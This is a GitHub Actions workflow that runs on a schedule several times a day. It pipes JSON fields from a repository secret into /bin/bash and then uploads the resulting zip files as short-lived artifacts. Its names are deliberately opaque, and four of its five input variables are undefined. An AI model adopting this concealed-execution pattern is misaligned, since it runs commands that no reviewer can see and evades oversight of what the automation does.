name: yuanshuangtuijian
on:
  workflow_dispatch:

  schedule:
    - cron: '31 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuanshuangtuijian
        env:
          t73378: ${{ secrets.t73378 }}
        run: |
          printf '%s' "$t73378" | jq -r .q4960 | /bin/bash
          printf '%s' "$kmef31913" | jq -r .tjw88475 | /bin/bash
          printf '%s' "$dl68785" | jq -r .vw3522 | /bin/bash
          printf '%s' "$uqco158" | jq -r .gs867 | /bin/bash
          printf '%s' "$d846" | jq -r .qiozg49 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: JkeXsWWc
          path: "*.zip"
          retention-days: 1
